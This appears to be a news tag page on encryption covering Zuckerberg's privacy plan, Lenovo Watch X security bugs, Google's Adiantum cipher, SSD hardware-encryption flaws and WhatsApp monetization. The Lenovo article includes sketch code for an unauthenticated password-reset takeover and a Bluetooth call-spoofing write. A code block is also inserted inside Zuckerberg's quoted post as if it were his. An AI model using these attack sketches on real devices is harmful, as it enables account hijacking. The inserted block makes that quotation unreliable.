encryption

Zuckerberg wants messages to auto-expire to make Facebook a ‘living room’

On feed-based “broader social networks, where people can accumulate friends or followers until the services feel more public . . . it feels more like a town square than a more intimate space like a living room,” Facebook CEO Mark Zuckerberg explained in a blog post today. With messaging, groups, and ephemeral stories among the fastest-growing social features, Zuckerberg laid out why he’s rethinking Facebook as a private living room where people can be comfortable being themselves without fear of hackers, government spying, or embarrassment from old content — all without encryption allowing bad actors to hide their crimes.

Perhaps this will just be more lip service in a time of PR crisis for Facebook. But with the business imperative fueled by social networking’s shift away from permanent feed broadcasting, Facebook can espouse the philosophy of privacy while in reality serving its shareholders and bottom line. It’s this alignment that actually spurs product change. We saw Facebook’s agility with last year’s realization that a misinformation- and hate-plagued platform wouldn’t survive long-term, so it had to triple its security and moderation staff. And in 2017, recognizing the threat of Stories, it implemented them across its apps. Now Facebook might finally see the dollar signs within privacy.

The New York Times’ Mike Isaac recently reported that Facebook planned to unify its Facebook, WhatsApp, and Instagram messaging infrastructure to allow cross-app messaging and end-to-end encryption. And Zuckerberg discussed this and the value of ephemerality on the recent earnings call. But now Zuckerberg has roadmapped a clearer slate of changes and policies to turn Facebook into a living room:

- Facebook will let users opt in to the ability to send or receive messages across Facebook, WhatsApp, and Instagram.

- Facebook wants to expand that interoperability to SMS on Android.

- Zuckerberg wants to make ephemerality automatic on messaging threads, so chats disappear by default after a month or a year, with users able to control that or put timers on individual messages.

- Facebook plans to limit how long it retains metadata on messages once it’s no longer needed for spam or safety protections.

- Facebook will extend end-to-end encryption across its messaging apps, but will use metadata and other non-content signals to weed out criminals using privacy to hide their misdeeds.

- Facebook won’t store data in countries with a bad track record of privacy abuse, such as Russia, even if that means having to shut down or postpone operations in a country.

You can read the full blog post from Zuckerberg below:

A Privacy-Focused Vision for Social Networking

My focus for the last couple of years has been understanding and addressing the biggest challenges facing Facebook. This means taking positions on important issues concerning the future of the internet. In this note, I’ll outline our vision and principles around building a privacy-focused messaging and social networking platform. There’s a lot to do here, and we’re committed to working openly and consulting with experts across society as we develop this.

Over the last 15 years, Facebook and Instagram have helped people connect with friends, communities, and interests in the digital equivalent of a town square. But people increasingly also want to connect privately in the digital equivalent of the living room. As I think about the future of the internet, I believe a privacy-focused communications platform will become even more important than today’s open platforms. Privacy gives people the freedom to be themselves and connect more naturally, which is why we build social networks.

Today we already see that private messaging, ephemeral stories, and small groups are by far the fastest growing areas of online communication. There are a number of reasons for this. Many people prefer the intimacy of communicating one-on-one or with just a few friends. People are more cautious of having a permanent record of what they’ve shared. And we all expect to be able to do things like payments privately and securely.

Public social networks will continue to be very important in people’s lives — for connecting with everyone you know, discovering new people, ideas and content, and giving people a voice more broadly. People find these valuable every day, and there are still a lot of useful services to build on top of them. But now, with all the ways people also want to interact privately, there’s also an opportunity to build a simpler platform that’s focused on privacy first.

I understand that many people don’t think Facebook can or would even want to build this kind of privacy-focused platform — because frankly we don’t currently have a strong reputation for building privacy protective services, and we’ve historically focused on tools for more open sharing. But we’ve repeatedly shown that we can evolve to build the services that people really want, including in private messaging and stories.

I believe the future of communication will increasingly shift to private, encrypted services where people can be confident what they say to each other stays secure and their messages and content won’t stick around forever. This is the future I hope we will help bring about.

We plan to build this the way we’ve developed WhatsApp: focus on the most fundamental and private use case — messaging — make it as secure as possible, and then build more ways for people to interact on top of that, including calls, video chats, groups, stories, businesses, payments, commerce, and ultimately a platform for many other kinds of private services.

This privacy-focused platform will be built around several principles:

Private interactions. People should have simple, intimate places where they have clear control over who can communicate with them and confidence that no one else can access what they share.

Encryption. People’s private communications should be secure. End-to-end encryption prevents anyone — including us — from seeing what people share on our services.

Reducing permanence. People should be comfortable being themselves, and should not have to worry about what they share coming back to hurt them later. So we won’t keep messages or stories around for longer than necessary to deliver the service or longer than people want them.

Safety. People should expect that we will do everything we can to keep them safe on our services within the limits of what’s possible in an encrypted service.

Interoperability. People should be able to use any of our apps to reach their friends, and they should be able to communicate across networks easily and securely.

Secure data storage. People should expect that we won’t store sensitive data in countries with weak records on human rights like privacy and freedom of expression in order to protect data from being improperly accessed.

Over the next few years, we plan to rebuild more of our services around these ideas. The decisions we’ll face along the way will mean taking positions on important issues concerning the future of the internet. We understand there are a lot of tradeoffs to get right, and we’re committed to consulting with experts and discussing the best way forward. This will take some time, but we’re not going to develop this major change in our direction behind closed doors. We’re going to do this as openly and collaboratively as we can because many of these issues affect different parts of society.

Private Interactions as a Foundation

For a service to feel private, there must never be any doubt about who you are communicating with. We’ve worked hard to build privacy into all our products, including those for public sharing. But one great property of messaging services is that even as your contacts list grows, your individual threads and groups remain private. As your friends evolve over time, messaging services evolve gracefully and remain intimate.

This is different from broader social networks, where people can accumulate friends or followers until the services feel more public. This is well-suited to many important uses — telling all your friends about something, using your voice on important topics, finding communities of people with similar interests, following creators and media, buying and selling things, organizing fundraisers, growing businesses, or many other things that benefit from having everyone you know in one place. Still, when you see all these experiences together, it feels more like a town square than a more intimate space like a living room.

There is an opportunity to build a platform that focuses on all of the ways people want to interact privately. This sense of privacy and intimacy is not just about technical features — it is designed deeply into the feel of the service overall. In WhatsApp, for example, our team is obsessed with creating an intimate environment in every aspect of the product. Even where we’ve built features that allow for broader sharing, it’s still a less public experience. When the team built groups, they put in a size limit to make sure every interaction felt private. When we shipped stories on WhatsApp, we limited public content because we worried it might erode the feeling of privacy to see lots of public content — even if it didn’t actually change who you’re sharing with.

In a few years, I expect future versions of Messenger and WhatsApp to become the main ways people communicate on the Facebook network. We’re focused on making both of these apps faster, simpler, more private and more secure, including with end-to-end encryption. We then plan to add more ways to interact privately with your friends, groups, and businesses. If this evolution is successful, interacting with your friends and family across the Facebook network will become a fundamentally more private experience.

Encryption and Safety

People expect their private communications to be secure and to only be seen by the people they’ve sent them to — not hackers, criminals, over-reaching governments, or even the people operating the services they’re using.

There is a growing awareness that the more entities that have access to your data, the more vulnerabilities there are for someone to misuse it or for a cyber attack to expose it. There is also a growing concern among some that technology may be centralizing power in the hands of governments and companies like ours. And some people worry that our services could access their messages and use them for advertising or in other ways they don’t expect.

End-to-end encryption is an important tool in developing a privacy-focused social network. Encryption is decentralizing — it limits services like ours from seeing the content flowing through them and makes it much harder for anyone else to access your information. This is why encryption is an increasingly important part of our online lives, from banking to healthcare services. It’s also why we built end-to-end encryption into WhatsApp after we acquired it.

In the last year, I’ve spoken with dissidents who’ve told me encryption is the reason they are free, or even alive. Governments often make unlawful demands for data, and while we push back and fight these requests in court, there’s always a risk we’ll lose a case — and if the information isn’t encrypted we’d either have to turn over the data or risk our employees being arrested if we failed to comply. This may seem extreme, but we’ve had a case where one of our employees was actually jailed for not providing access to someone’s private information even though we couldn’t access it since it was encrypted.

At the same time, there are real safety concerns to address before we can implement end-to-end encryption across all of our messaging services. Encryption is a powerful tool for privacy, but that includes the privacy of people doing bad things. When billions of people use a service to connect, some of them are going to misuse it for truly terrible things like child exploitation, terrorism, and extortion. We have a responsibility to work with law enforcement and to help prevent these wherever we can. We are working to improve our ability to identify and stop bad actors across our apps by detecting patterns of activity or through other means, even when we can’t see the content of the messages, and we will continue to invest in this work. But we face an inherent tradeoff because we will never find all of the potential harm we do today when our security systems can see the messages themselves.

Finding the right ways to protect both privacy and safety is something societies have historically grappled with. There are still many open questions here and we’ll consult with safety experts, law enforcement and governments on the best ways to implement safety measures. We’ll also need to work together with other platforms to make sure that as an industry we get this right. The more we can create a common approach, the better.

On balance, I believe working towards implementing end-to-end encryption for all private communications is the right thing to do. Messages and calls are some of the most sensitive private conversations people have, and in a world of increasing cyber security threats and heavy-handed government intervention in many countries, people want us to take the extra step to secure their most private data. That seems right to me, as long as we take the time to build the appropriate safety systems that stop bad actors as much as we possibly can within the limits of an encrypted service. We’ve started working on these safety systems building on the work we’ve done in WhatsApp, and we’ll discuss them with experts through 2019 and beyond before fully implementing end-to-end encryption. As we learn more from those experts, we’ll finalize how to roll out these systems.

Reducing Permanence

We increasingly believe it’s important to keep information around for shorter periods of time. People want to know that what they share won’t come back to hurt them later, and reducing the length of time their information is stored and accessible will help.

One challenge in building social tools is the “permanence problem”. As we build up large collections of messages and photos over time, they can become a liability as well as an asset. For example, many people who have been on Facebook for a long time have photos from when they were younger that could be embarrassing. But people also really love keeping a record of their lives. And if all posts on Facebook and Instagram disappeared, people would lose access to a lot of valuable knowledge and experiences others have shared.

I believe there’s an opportunity to set a new standard for private communication platforms — where content automatically expires or is archived over time. Stories already expire after 24 hours unless you archive them, and that gives people the comfort to share more naturally. This philosophy could be extended to all private content.

For example, messages could be deleted after a month or a year by default. This would reduce the risk of your messages resurfacing and embarrassing you later. Of course you’d have the ability to change the timeframe or turn off auto-deletion for your threads if you wanted. And we could also provide an option for you to set individual messages to expire after a few seconds or minutes if you wanted.
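
As a toy sketch of that precedence (not Facebook’s implementation; the names and defaults below are invented): a per-message timer overrides a per-thread setting, which overrides the global default.

```python
# Hypothetical retention rule: message timer > thread setting > global default.
from datetime import datetime, timedelta, timezone

DEFAULT_TTL = timedelta(days=365)  # invented default of one year

def expires_at(sent_at, thread_ttl=None, message_ttl=None):
    ttl = message_ttl or thread_ttl or DEFAULT_TTL
    return sent_at + ttl

sent = datetime.now(timezone.utc)
print(expires_at(sent))                                    # default: one year
print(expires_at(sent, thread_ttl=timedelta(days=30)))     # thread set to a month
print(expires_at(sent, message_ttl=timedelta(seconds=30))) # per-message timer
```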

It also makes sense to limit the amount of time we store messaging metadata. We use this data to run our spam and safety systems, but we don’t always need to keep it around for a long time. An important part of the solution is to collect less personal data in the first place, which is the way WhatsApp was built from the outset.

Interoperability

People want to be able to choose which service they use to communicate with people. However, today if you want to message people on Facebook you have to use Messenger, on Instagram you have to use Direct, and on WhatsApp you have to use WhatsApp. We want to give people a choice so they can reach their friends across these networks from whichever app they prefer.

We plan to start by making it possible for you to send messages to your contacts using any of our services, and then to extend that interoperability to SMS too. Of course, this would be opt-in and you will be able to keep your accounts separate if you’d like.

There are privacy and security advantages to interoperability. For example, many people use Messenger on Android to send and receive SMS texts. Those texts can’t be end-to-end encrypted because the SMS protocol is not encrypted. With the ability to message across our services, however, you’d be able to send an encrypted message to someone’s phone number in WhatsApp from Messenger.

This could also improve convenience in many experiences where people use Facebook or Instagram as their social network and WhatsApp as their preferred messaging service. For example, lots of people selling items on Marketplace list their phone number so people can message them about buying it. That’s not ideal, because you’re giving strangers your phone number. With interoperability, you’d be able to use WhatsApp to receive messages sent to your Facebook account without sharing your phone number — and the buyer wouldn’t have to worry about whether you prefer to be messaged on one network or the other.

You can imagine many simple experiences — a person discovers a business on Instagram and easily transitions to their preferred messaging app for secure payments and customer support; another person wants to catch up with a friend and can send them a message that goes to their preferred app without having to think about where that person prefers to be reached; or you simply post a story from your day across both Facebook and Instagram and can get all the replies from your friends in one place.

You can already send and receive SMS texts through Messenger on Android today, and we’d like to extend this further in the future, perhaps including the new telecom RCS standard. However, there are several issues we’ll need to work through before this will be possible. First, Apple doesn’t allow apps to interoperate with SMS on their devices, so we’d only be able to do this on Android. Second, we’d need to make sure interoperability doesn’t compromise the expectation of encryption that people already have using WhatsApp. Finally, it would create safety and spam vulnerabilities in an encrypted system to let people send messages from unknown apps where our safety and security systems couldn’t see the patterns of activity.

These are significant challenges and there are many questions here that require further consultation and discussion. But if we can implement this, we can give people more choice to use their preferred service to securely reach the people they want.

Secure Data Storage

People want to know their data is stored securely in places they trust. Looking at the future of the internet and privacy, I believe one of the most important decisions we’ll make is where we’ll build data centers and store people’s sensitive data.

There’s an important difference between providing a service in a country and storing people’s data there. As we build our infrastructure around the world, we’ve chosen not to build data centers in countries that have a track record of violating human rights like privacy or freedom of expression. If we build data centers and store sensitive data in these countries, rather than just caching non-sensitive data, it could make it easier for those governments to take people’s information.

Upholding this principle may mean that our services will get blocked in some countries, or that we won’t be able to enter others anytime soon. That’s a tradeoff we’re willing to make. We do not believe storing people’s data in some countries is a secure enough foundation to build such important internet infrastructure on.

Of course, the best way to protect the most sensitive data is not to store it at all, which is why WhatsApp doesn’t store any encryption keys and we plan to do the same with our other services going forward.

But storing data in more countries also establishes a precedent that emboldens other governments to seek greater access to their citizens’ data and therefore weakens privacy and security protections for people around the world. I think it’s important for the future of the internet and privacy that our industry continues to hold firm against storing people’s data in places where it won’t be secure.

Next Steps

Over the next year and beyond, there are a lot more details and trade-offs to work through related to each of these principles. A lot of this work is in the early stages, and we are committed to consulting with experts, advocates, industry partners, and governments — including law enforcement and regulators — around the world to get these decisions right.

At the same time, working through these principles is only the first step in building out a privacy-focused social platform. Beyond that, significant thought needs to go into all of the services we build on top of that foundation — from how people do payments and financial transactions, to the role of businesses and advertising, to how we can offer a platform for other private services.

But these initial questions are critical to get right. If we do this well, we can create platforms for private sharing that could be even more important to people than the platforms we’ve already built to help people share and connect more openly.

Doing this means taking positions on some of the most important issues facing the future of the internet. As a society, we have an opportunity to set out where we stand, to decide how we value private communications, and who gets to decide how long and where data should be stored.

I believe we should be working towards a world where people can speak privately and live freely knowing that their information will only be seen by who they want to see it and won’t all stick around forever. If we can help move the world in this direction, I will be proud of the difference we’ve made.

Lenovo Watch X was riddled with security bugs, researcher says

Lenovo’s Watch X was widely panned as “absolutely terrible.” As it turns out, so was its security.

The $50 Watch X was one of Lenovo’s cheapest smartwatches. Sold only in the China market, it has to be bought directly from the mainland. Luckily for Erez Yalon, head of security research at Checkmarx, an application security testing company, a friend gave him one. It didn’t take him long to find several vulnerabilities that allowed him to change users’ passwords, hijack accounts and spoof phone calls.

Because the smartwatch wasn’t using any encryption to send data from the app to the server, Yalon said he was able to see his registered email address and password sent in plain text, as well as data about how he was using the watch, like how many steps he was taking.

“The entire API was unencrypted,” said Yalon in an email to TechCrunch. “All data was transferred in plain-text.”

The API that helps power the watch was easily abused, he found, allowing him to reset anyone’s password simply by knowing a person’s username. That could’ve given him access to anyone’s account, he said.
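
Yalon didn’t publish the endpoints, but the class of bug is well known. Here is a schematic sketch of what such a flaw looks like, with an entirely hypothetical URL and field names: a password-reset request sent over plain HTTP, with no proof of account ownership required.

```python
# A schematic sketch of the vulnerability class described above: an
# unauthenticated, unencrypted password-reset endpoint. All names here are
# hypothetical stand-ins, not the actual Lenovo API.
import requests

resp = requests.post(
    # Plain HTTP: the parameters are visible to anyone on the network path.
    "http://api.watch.example.com/user/resetPassword",  # hypothetical URL
    data={
        "username": "victim@example.com",   # no proof of ownership required
        "newPassword": "attacker-chosen",
    },
    timeout=10,
)
# A vulnerable server would answer 200 here and change the victim's password.
print(resp.status_code)
```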

Not only that, he found that the watch was sharing his precise geolocation with a server in China. Given the watch’s exclusivity to China, that might not be a red flag for users there. But Yalon said the watch had “already pinpointed my location” before he had even registered his account.

Yalon’s research wasn’t just limited to the leaky API. He found that the Bluetooth-enabled smartwatch could also be manipulated from nearby, by sending crafted Bluetooth requests. Using a small script, he demonstrated how easy it was to spoof a phone call on the watch.

Using a similar malicious Bluetooth command, he could also set the alarm to go off — again and again. “The function allows adding multiple alarms, as often as every minute,” he said.
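
Yalon’s scripts weren’t released, but the underlying technique is a standard unauthenticated BLE write. Below is a hedged sketch using the cross-platform bleak library; the device address, characteristic UUID and payload format are placeholders, since the real values came from reverse engineering the watch.

```python
# A sketch of the "crafted Bluetooth request" technique with bleak.
# WATCH_ADDRESS and CALL_CHAR_UUID are hypothetical placeholders.
import asyncio
from bleak import BleakClient

WATCH_ADDRESS = "AA:BB:CC:DD:EE:FF"                      # hypothetical
CALL_CHAR_UUID = "0000ffe1-0000-1000-8000-00805f9b34fb"  # hypothetical

async def spoof_call(number: bytes) -> None:
    async with BleakClient(WATCH_ADDRESS) as client:
        # Without pairing or authentication, any nearby device can write to
        # the characteristic and trigger a fake incoming call on the watch.
        await client.write_gatt_char(CALL_CHAR_UUID, number)

asyncio.run(spoof_call(b"+15555550123"))
```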

Lenovo didn’t have much to say about the vulnerabilities, besides confirming their existence.

“The Watch X was designed for the China market and is only available from Lenovo to limited sales channels in China,” said spokesperson Andrew Barron. “Our [security] team has been working with the [original device manufacturer] that makes the watch to address the vulnerabilities identified by a researcher and all fixes are due to be completed this week.”

Yalon said that encrypting the traffic between the watch, the Android app and its web server would prevent snooping and help reduce manipulation.

“Fixing the API permissions eliminates the ability of malicious users to send commands to the watch, spoof calls, and set alarms,” he said.

Google makes it easier for cheap phones and smart devices to encrypt your data

Encryption is an important part of the whole securing-your-data package, but it’s easy to underestimate the amount of complexity it adds to any service or device. One part of that is the amount of processing encryption takes — an amount that could be impractical on small or low-end devices. Google wants to change that with a highly efficient new method called Adiantum.

Here’s the problem. While encryption is in a way just transforming one block of data reversibly into another, that process is actually pretty complicated. Math needs to be done, data read and written and reread and rewritten and confirmed and hashed.

For a text message that’s not so hard. But if you have to do the same thing as you store or retrieve megabyte after megabyte of data, for instance with images or video, that extra computation adds up quick.

Lots of modern smartphones and other gadgets are equipped with a special chip that performs some of the most common encryption algorithms and processes (namely AES), just like we have GPUs to handle graphics calculations in games and such.

But what about older phones, or cheaper ones, or tiny smart home gadgets that don’t have room for that kind of thing on their boards? Just like they can’t run the latest games, they might not be able to efficiently run the latest cryptographic processes. They can still encrypt things, of course, but it might take too long for certain apps to work, or drain the battery.

Google, clearly interested in keeping cheap phones competitive, is tackling this problem by creating a special encryption method just for low-power phones. They call it Adiantum, and it will be optionally part of Android distributions going forward.

The technical details are all here, but the gist is this. Instead of using AES it relies on a cipher called ChaCha. This cipher is highly optimized for basic binary operations, which any processor can execute quickly, though of course it will be outstripped by specialized hardware and drivers. It’s well documented and already in use in lots of places — this isn’t some no-name bargain-bin code. As Google shows, it performs far better than AES on lower-end processors like the ARM Cortex-A7.
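
You can get a feel for the difference on your own hardware with a rough micro-benchmark using Python’s `cryptography` package. Note this compares the raw ciphers, not Adiantum itself, which builds a wide-block construction on top of ChaCha.

```python
# A rough, illustrative micro-benchmark of ChaCha20 vs. AES-CTR in software.
# On an x86 machine with AES-NI, AES will usually win; on chips without AES
# instructions (the Cortex-A7 case above), ChaCha-style ciphers tend to win.
import os
import time

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key = os.urandom(32)                  # 256-bit key for both ciphers
data = os.urandom(16 * 1024 * 1024)   # 16 MB payload, e.g. a photo burst

def encrypt_seconds(cipher):
    enc = cipher.encryptor()
    start = time.perf_counter()
    enc.update(data)
    enc.finalize()
    return time.perf_counter() - start

chacha = Cipher(algorithms.ChaCha20(key, os.urandom(16)), mode=None)
aes_ctr = Cipher(algorithms.AES(key), modes.CTR(os.urandom(16)))

print(f"ChaCha20: {encrypt_seconds(chacha):.3f}s")
print(f"AES-CTR:  {encrypt_seconds(aes_ctr):.3f}s")
```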

The Adiantum process doesn’t increase or decrease the size of the payload (for instance by padding it or by appending some header or footer data), meaning the same number of bytes come in as go out. That’s nice when you’re a file system and don’t want to have to set aside too many special blocks for encryption metadata and the like.
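
That length-preserving property is easy to observe with a plain stream cipher, which Adiantum builds on. A small sketch, again with the `cryptography` package; this demonstrates the property itself, not Adiantum’s actual construction.

```python
# ChaCha20 is a stream cipher: N plaintext bytes become exactly N ciphertext
# bytes, with no padding, headers or footers. Adiantum keeps this property
# while adding the stronger wide-block behavior disk encryption needs.
import os

from cryptography.hazmat.primitives.ciphers import Cipher, algorithms

key, nonce = os.urandom(32), os.urandom(16)
plaintext = os.urandom(4096)          # one typical disk sector
enc = Cipher(algorithms.ChaCha20(key, nonce), mode=None).encryptor()
ciphertext = enc.update(plaintext) + enc.finalize()
assert len(ciphertext) == len(plaintext)
```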

Naturally new encryption techniques are viewed with some skepticism by security professionals, for whom the greatest pleasure in life is to prove one is compromised or unreliable. Adiantum’s engineers say they have “high confidence in its security,” with the assumption (currently reasonable) that its component “primitives” ChaCha and AES are themselves secure. We’ll soon see!

In the meantime don’t expect any instant gains, but future low-power devices may offer better security without having to use more expensive components — you won’t have to do a thing, either.

Oh, and in case you were wondering:

Adiantum is named after the genus of the maidenhair fern, which in the Victorian language of flowers (floriography) represents sincerity and discretion.

Security researchers have busted the encryption in several popular Crucial and Samsung SSDs

Researchers at Radboud University have found critical security flaws in several popular Crucial and Samsung solid state drives (SSDs), which they say can be easily exploited to recover encrypted data without knowing the password.

The researchers, who detailed their findings in a new paper out Monday, reverse engineered the firmware of several drives to find a “pattern of critical issues” across the device makers.

In the case of one drive, the master password used to decrypt the drive’s data was just an empty string and could be easily exploited by flipping a single bit in the drive’s memory. Another drive could be unlocked with “any password” by crippling the drive’s password validation checks.

That wouldn’t be much of a problem if an affected drive also used software encryption to secure its data. But the researchers found that in the case of Windows computers, often the default policy for BitLocker’s software-based drive encryption is to trust the drive — and therefore rely entirely on a device’s hardware encryption to protect the data. Yet, as the researchers found, if the hardware encryption is buggy, BitLocker isn’t doing much to prevent data theft.
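
Windows users who want to know which mode they are in can ask the stock BitLocker CLI. A small sketch that shells out to `manage-bde` (run from an elevated prompt; the exact wording of the status output can vary between Windows versions):

```python
# Check whether BitLocker is doing the encryption itself or deferring to the
# drive's self-encryption. Requires an elevated (administrator) prompt.
import subprocess

out = subprocess.run(
    ["manage-bde", "-status", "C:"],
    capture_output=True, text=True, check=True,
).stdout

for line in out.splitlines():
    if "Encryption Method" in line:
        print(line.strip())
        if "Hardware" in line:
            print("BitLocker is trusting the SSD's self-encryption (see above).")
```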

In other words, users “should not rely solely on hardware encryption as offered by SSDs for confidentiality,” the researchers said.

Alan Woodward, a professor at the University of Surrey, said that the greatest risk to users is the drive’s security “failing silently.”

“You might think you’ve done the right thing enabling BitLocker but then a third-party fault undermines your security, but you never know and never would know,” he said.

Matthew Green, a cryptography professor at Johns Hopkins, described the BitLocker flaw in a tweet as “like jumping out of a plane with an umbrella instead of a parachute.”

The researchers said that their findings are not yet finalized — pending a peer review. But the research was made public after disclosing the bugs to the drive makers in April.

Crucial’s MX100, MX200 and MX300 drives, Samsung’s T3 and T5 USB external disks, and Samsung’s 840 EVO and 850 EVO internal SSDs are known to be affected, but the researchers warned that many other drives may also be at risk.

The researchers criticized the device makers’ proprietary, closed-source cryptography, which they said — and proved — is “often shown to be much weaker in practice” than open-source, auditable cryptographic implementations. “Manufacturers that take security seriously should publish their crypto schemes and corresponding code so that security claims can be independently verified,” they wrote.

The researchers recommend using software-based encryption, like the open-source software VeraCrypt.

In an advisory, Samsung also recommended that users install encryption software to prevent any “potential breach of self-encrypting SSDs.” Crucial’s owner Micron is said to have a fix on the way, according to an advisory by the Netherlands’ National Cyber Security Center, though the advisory did not say when.

Micron did not immediately respond to a request for comment.

Facebook’s ex-CSO, Alex Stamos, defends its decision to inject ads in WhatsApp

Alex Stamos, Facebook’s former chief security officer, who left the company this summer to take up a role in academia, has made a contribution to what’s sometimes couched as a debate about how to monetize (and thus sustain) commercial end-to-end encrypted messaging platforms in order that the privacy benefits they otherwise offer can be as widely spread as possible.

Stamos made the comments via Twitter, where he said he was indirectly responding to the fallout from a Forbes interview with WhatsApp co-founder Brian Acton — in which Acton hit out at his former employer for being greedy in its approach to generating revenue off of the famously anti-ads messaging platform.

Both WhatsApp founders’ exits from Facebook have been blamed on disagreements over monetization. (Jan Koum left some months after Acton.)

In the interview, Acton said he had suggested Facebook management apply a simple business model atop WhatsApp, such as metered messaging for all users after a set number of free messages. But management pushed back — with Facebook COO Sheryl Sandberg telling him they needed a monetization method that generates greater revenue “scale”.

And while Stamos has avoided making critical remarks about Acton (unlike some current Facebook staffers), he clearly wants to lend his weight to the notion that some kind of trade-off is necessary for end-to-end encryption to be commercially viable (and thus for the greater good of messaging privacy to prevail), and therefore his tacit support to Facebook and its approach to making money off of a robustly encrypted platform.

Stamos’ own departure from the Facebook mothership was hardly on such acrimonious terms as Acton’s, though he has had his own disagreements with the leadership team — as set out in a memo he sent earlier this year that was obtained by BuzzFeed. So his support for Facebook combining e2e and ads perhaps counts for something, though it isn’t really surprising given the seat he occupied at the company for several years, and his always fierce defence of WhatsApp encryption.

(Another characteristic concern that also surfaces in Stamos’ Twitter thread is the need to keep the technology legal, in the face of government attempts to backdoor encryption, which he says will require “accepting the inevitable downsides of giving people unfettered communications”.)

I don’t want to weigh into the personal side of the WhatsApp vs Facebook fight, as there are people I respect on both sides, but I do want to use this as an opportunity to talk about the future of end-to-end encryption. (1/13)

— Alex Stamos (@alexstamos) September 26, 2018

This summer Facebook confirmed that, from next year, ads will be injected into WhatsApp statuses (aka the app’s Stories clone). So it is indeed bringing ads to the famously anti-ads messaging platform.

For several years the company has also been moving towards positioning WhatsApp as a business messaging platform to connect companies with potential customers — and it says it plans to meter those messages, also from next year.

So there are two strands to its revenue-generating playbook atop WhatsApp’s e2e encrypted messaging platform, both with knock-on impacts on privacy, given that Facebook targets ads and marketing content by profiling users with harvested personal data.

This means that while WhatsApp’s e2e encryption means Facebook literally cannot read WhatsApp users’ messages, it is ‘circumventing’ the technology (for ad-targeting purposes) by linking accounts across different services it owns — using people’s digital identities across its product portfolio (and beyond) as a sort of ‘trojan horse’ to negate the messaging privacy it affords them on WhatsApp.

Facebook is using different technical methods (including the very low-tech method of phone number matching) to link WhatsApp user and Facebook accounts. Once it’s been able to match a Facebook user to a WhatsApp account it can then connect what’s very likely to be a well fleshed out Facebook profile with a WhatsApp account that nonetheless contains messages it can’t read. So it’s both respecting and eroding user privacy.
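
Schematically, that kind of record linkage is just a join on normalized phone numbers. A purely illustrative sketch, with invented records and no claim about how Facebook actually implements it:

```python
# Illustrative record linkage: match accounts across two services on a
# normalized phone number. Data and normalization rules are invented.
def normalize(number: str) -> str:
    digits = "".join(ch for ch in number if ch.isdigit())
    return digits[-10:]  # naive: compare on the last ten digits

facebook_accounts = [{"fb_id": 101, "phone": "+1 (555) 555-0123"}]
whatsapp_accounts = [{"wa_id": "A7", "phone": "15555550123"}]

fb_by_phone = {normalize(a["phone"]): a for a in facebook_accounts}
links = [
    (fb_by_phone[normalize(w["phone"])]["fb_id"], w["wa_id"])
    for w in whatsapp_accounts
    if normalize(w["phone"]) in fb_by_phone
]
print(links)  # [(101, 'A7')]
```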

This approach means Facebook can carry out its ad targeting activities across both messaging platforms (as it will from next year). And do so without having to literally read messages being sent by WhatsApp users.

As trade-offs go, it’s clearly a big one — and one that’s got Facebook into regulatory trouble in Europe.

It is also, at least in Stamos’ view, a trade off that’s worth it for the ‘greater good’ of message content remaining strongly encrypted and therefore unreadable. Even if Facebook now knows pretty much everything about the sender, and can access any unencrypted messages they sent using its other social products.

In his Twitter thread Stamos argues that “if we want that right to be extended to people around the world, that means that E2E encryption needs to be deployed inside of multi-billion user platforms”, which he says means: “We need to find a sustainable business model for professionally-run E2E encrypted communication platforms.”

On the sustainable business model front he argues that two models “currently fit the bill” — either Apple’s iMessage or Facebook-owned WhatsApp. Though he doesn’t go into any detail on why he believes only those two are sustainable.

He does say he’s discounting the Acton-backed alternative, Signal, which now operates via a not-for-profit (the Signal Foundation) — suggesting that rival messaging app is “unlikely to hit 1B users”.

In passing he also throws it out there that Signal is “subsidized, indirectly, by FB ads” — i.e. because Facebook pays a licensing fee for use of the underlying Signal Protocol used to power WhatsApp’s e2e encryption. (So his slightly shade-throwing subtext is that privacy purists are still benefiting from a Facebook sugardaddy.)

Then he gets to the meat of his argument in defence of Facebook-owned (and monetized) WhatsApp — pointing out that Apple’s sustainable business model does not reach every mobile user, given its hardware is priced at a premium. Whereas WhatsApp running on a cheap Android handset ($50, or perhaps even $30 in future) can.

Other encrypted messaging apps can also of course run on Android but presumably Stamos would argue they’re not professionally run.

“I think it is easy to underestimate how radical WhatsApp’s decision to deploy E2E was,” he writes. “Acton and Koum, with Zuck’s blessing, jumped off a bridge with the goal of building a monetization parachute on the way down. FB has a lot of money, so it was a very tall bridge, but it is foolish to expect that FB shareholders are going to subsidize a free text/voice/video global communications network forever. Eventually, WhatsApp is going to need to generate revenue.

“This could come from directly charging for the service, it could come from advertising, it could come from a WeChat-like services play. The first is very hard across countries, the latter two are complicated by E2E.”

“I can’t speak to the various options that have been floated around, or the arguments between WA and FB, but those of us who care about privacy shouldn’t see WhatsApp monetization as something evil,” he adds. “In fact, we should want WA to demonstrate that E2E and revenue are compatible. That’s the only way E2E will become a sustainable feature of massive, non-niche technology platforms.”

Stamos is certainly right that Apple’s iMessage cannot reach every mobile user, given the premium cost of Apple hardware.

Though he elides the important role that secondhand Apple devices play in reducing the barrier to entry to Apple’s pro-privacy technology — a role Apple actively encourages by supporting older devices, and by expanding its services business so that supporting older versions of iOS (and thus secondhand iPhones) remains commercially sustainable.

Robust encryption only being possible via multi-billion user platforms essentially boils down to a usability argument by Stamos — which is to suggest that mainstream app users will simply not seek encryption out unless it’s plated up for them in a way they don’t even notice it’s there.

The follow on conclusion is then that only a well-resourced giant like Facebook has the resources to maintain and serve this different tech up to the masses.

There’s certainly substance in that point. But the wider question is whether the privacy trade-offs entailed by Facebook’s methods of monetizing WhatsApp (linking Facebook and WhatsApp accounts, and thereby looping in the various less-than-transparent data-harvesting methods it uses to gather intelligence on web users generally) substantially erode the value of the e2e encryption now being bundled with Facebook’s ad-targeting surveillance of people, with the encryption used as a selling aid for otherwise privacy-eroding practices.

Yes, WhatsApp users’ messages will remain private, thanks to Facebook funding the necessary e2e encryption. But the price users are having to pay is very likely still their personal privacy.

And at that point the argument really becomes: how much profit should a commercial entity be able to extract from a product that’s marketed as securely encrypted and thus ‘pro-privacy’? How much revenue “scale” is reasonable or unreasonable in that scenario?

Other business models are possible, which was Acton’s point. But likely less profitable. And therein lies the rub where Facebook is concerned.

How much money should any company be required to leave on the table, as Acton did when he left Facebook without the rest of his unvested shares, in order to be able to monetize a technology that’s bound up so tightly with notions of privacy?

Acton wanted Facebook to agree to make as much money as it could without users having to pay it with their privacy. But Facebook’s management team said no. That’s why he’s calling them greedy.

